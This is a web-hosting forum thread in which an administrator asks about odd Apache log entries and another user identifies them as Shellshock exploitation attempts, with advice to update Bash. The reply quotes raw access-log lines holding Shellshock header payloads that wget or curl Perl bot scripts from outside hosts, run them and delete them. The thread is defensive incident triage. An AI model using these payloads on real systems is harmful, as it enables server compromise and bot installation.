Looks like someone trying to upload files to the server

tank

Well-Known Member
Apr 12, 2011
255
5
68
Chicago, IL
cPanel Access Level
Root Administrator
I noticed this is my apache error log.

Code:
[Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80... 
[Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
[Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response... 
[Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
[Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
[Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
[Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:      0K ...
[Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....                  
[Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                              100%  118K=0.06s
[Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
[Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3)  malformed
[Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                                  Dload  Upload   Total   Spent    Left  Speed
[Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101  7488
[Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   101  7488    0     0  39691      0 --:--:-- --:--:-- --:--:-- 59904
I looked for this file that was uploaded but could not find it.

How do I disable this and or what is this?
 

24x7server

Well-Known Member
Apr 17, 2013
1,911
96
78
India
cPanel Access Level
Root Administrator
Twitter

malk315

Registered
Nov 13, 2014
1
0
1
cPanel Access Level
Website Owner
This looks like a shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a perl script) which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently.

Log:

Code:
165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O
 /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
Here's another one:

Code:
81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget  http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tm
p/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf  lifesux.txt\\x22"
The telltale sign that a request is trying to exploit shellshock vulnerability in your BASH shell is the beginning function definition:

Code:
() { :; }
If you have an old version of BASH, update -- might need to build from source unless your box is really new.

There are lots of good sites out there that explain how to deal w/ shellshock.
I found this one quite helpful:

https://shellshocker.net/

Good luck.